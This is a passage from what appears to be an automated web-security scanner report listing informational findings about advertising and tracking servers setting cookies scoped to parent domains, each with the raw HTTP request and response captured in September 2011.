GET /J06575/b3/0/3/1008211/66697159.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Ftopics%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="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"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKlxLHFKzz4/0koCkSq5JBQoSmi7zZNoLT0dEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgq9z/0E1nIO9J9fupr6fHiqjuefo+lRV1atV4Hbe4J0B6z/RoE1OlugGgSP3MMlt9IUJJODkKZG3Nw4/m9kHTtC0hHopLYwirAifOKc5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGbzaZd2dky0d4PEM7QRN8YWclW7vMsiT9xDxB5BqTRyycw9kjP7n9k0mBN23/26VyDWsQXbFP9hc6xcdJ56gbc9aoDyd417qJh1f5VYyOgv3kiC8XFanPbQJ092ArYD50B0UuBaXIAGAg5g=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
Set-Cookie: udm_0=MLvv7iXuYS5npS5IdtJ9rYUnBG1JihVUWLZDwXDpfLby5LNpTzBgDsiqygfVxd+K709LxniKKr1/Jh0PZqrISRqeT7E3J/DikjgckzjZlb25WiMcZffZLOF2S/dP5ZcaSUyjrK5OU8eE/Wavz/TpePFNMR347DHYy3XTsgP5SOgfLi2GwOwvgwSwPLVp1lF3lYOUw6f71CvjHp+Rh4fhQCYkGhqAutVPhz+vTCxd0qyoBvHmxrcfZeCR+WPhx0hLfBQHIyR0lAybjT7WrbQdKQ1p21mwmYaKqD2ggWy/bPOUy7AIPoEwDd9Al3GUd/6WwYb6ifbYlDYxeMF8Gs4bgf44Lpr3AhvptLLNqAoF2xQFpyDXjMmuv9hPf2Ycb7kEPXmvqczS7iXwY+vPDiWLLcpHGbvlx38UVHa9EG7ByiyAurjCyLYLxlbjjX/DO1uknbOYlan89xrt3PsPSCciR/gs9XSoA+k3/mLyBOxjg1ZwmWwNhi5JUchRIQG3tn1ian+yYvzGpRivBsNAhhDeX+STD7boBawdVLIKsdraSo/2y0nY1qbU; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:53 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.36. http://pixel.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match&mm_bnc,%20http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921 HTTP/1.1
Host: pixel.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4e62cac5-3093-5789-301b-6f4e7fbf3921; ts=1315097285

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f38 32568
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:56:32 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097792; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:56:32 GMT
Content-Length: 0


11.37. http://r.casalemedia.com/rum

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /rum

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rum?cm_dsp_id=4&external_user_id=2925993182975414771 HTTP/1.1
Host: r.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMS=102679&1315097055; CMSC=TmLJ3w**; CMDD=AAF1owE*; CMD1=AAFehU5iyd8AAZEXAAOXuwEBAA**; CMID=qPptfUPS1JUAAD6emfQAAAAa; CMPS=179; CMPP=016; CMST=TmLJ305iysIC; CMIMP=102679&1315097282

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/gif
Expires: Sun, 04 Sep 2011 00:56:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:56:38 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMID=e9e8c1d58f5f3be19a1c66cf;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMPS=054;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMPP=002;domain=casalemedia.com;path=/;expires=Sat, 03 Dec 2011 00:56:38 GMT
Set-Cookie: CMRUM2=04000000002925993182975414771;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:56:38 GMT
Set-Cookie: CMST=TmLJ305izMYG;domain=casalemedia.com;path=/;expires=Mon, 05 Sep 2011 00:56:38 GMT

GIF89a.............!.......,...........D..;

11.38. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=2925993182975414771 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 03-Sep-2013 00:56:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.39. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=54&cver=1&uid=6422714091563403120 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=8071372312438671107; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:58:56 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:58:55 GMT

GIF89a.............!.......,...........D..;

11.40. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ItQwH2bCmVTfAECOql6s6SBT_BPJF-JVRX_nTmRBhFpwzH1UaDhfAXHNoQU6yinlbmW-EFxMQzXn3d_bHBz1AQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:47:35 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1166786&t=2
Content-Length: 0
Date: Sun, 04 Sep 2011 00:47:35 GMT


11.41. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fc=QAkDFs1L1_VV9R_c6UsDYaPBUEhJYdpD5gsI8S9o6pfJxmeG753N3cyfpzvDjP2Ci5OCbJ1Rk2iW9gYGlcBUN3tfVMi68hHF6JKMDotDPXLi3Sy-PEwXW67DoFr3mtCG; uid=2925993182975414771; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%7C21; rds=15221%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7C15221%7C15221%7C15221%7C15221%7C15221%7Cundefined%7C15221%7Cundefined%7Cundefined%7C15221%7C15221%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15221%7C15221; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=6981538011179690654; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:57:37 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:57:36 GMT

GIF89a.............!.......,...........D..;

11.42. http://rma-api.gravity.com/v1/beacons/initialize

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rma-api.gravity.com
Path:   /v1/beacons/initialize

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/beacons/initialize?u=undefined&sg=6e1ea1b081dc6743bbe3537728eca43d HTTP/1.1
Host: rma-api.gravity.com
Proxy-Connection: keep-alive
Referer: http://www.scribd.com/embeds/63688924/content?start_page=1&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839

Response

HTTP/1.1 200 OK
Server: ""
P3P: CP="NOI DSP COR ADMa OUR NOR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 70
Date: Sun, 04 Sep 2011 01:01:00 GMT
Connection: close
Set-Cookie: vaguid=172d38ad2d9b9b5aa42030c637b39839; Domain=.gravity.com; Expires=Sat, 05-May-2063 02:02:00 GMT; Path=/

GravityInsights.cc('grvinsights', '172d38ad2d9b9b5aa42030c637b39839');

11.43. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAABADMBDAABADMB/QABADABXwABADMB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:19 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAADADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:52:19 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

11.44. http://sync.adap.tv/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?type=gif&key=turn&uid=2925993182975414771 HTTP/1.1
Host: sync.adap.tv
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A44%3A51+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A59"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: rtbData0="key=turn:value=2925993182975414771:expiresAt=Sat+Sep+10+17%3A57%3A27+PDT+2011:32-Compatible=true,key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:44:07 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

11.45. http://sync.mathtag.com/sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync?mt_exid=2&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=296&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x4 pid 0x7f3c 32572
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Sun, 04 Sep 2011 00:55:52 GMT
Location: http://tag.admeld.com/match?admeld_adprovider_id=296&external_user_id=4e62cac5-3093-5789-301b-6f4e7fbf3921
Connection: Keep-Alive
Set-Cookie: ts=1315097752; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 00:55:52 GMT
Content-Length: 0


11.46. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&r=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&t=300?tm=330352 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:33 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=WyBPG2WuR0m9hGPSaL94eQ--; expires=Sat, 03-Sep-2016 07:13:33 GMT; path=/; domain=.mmismm.com
Content-Length: 43
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/javascript

var msegs='';Mindset.handleResponse(msegs);

11.47. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=LCN&si=11684&pi=-&xs=3&pu=http%253A//blogs.sacbee.com/the_state_worker/%2523navlink%253Dnavdrop%253Fifu%253Dhttp%25253A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&df=1&v=6.0&cb=78634 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
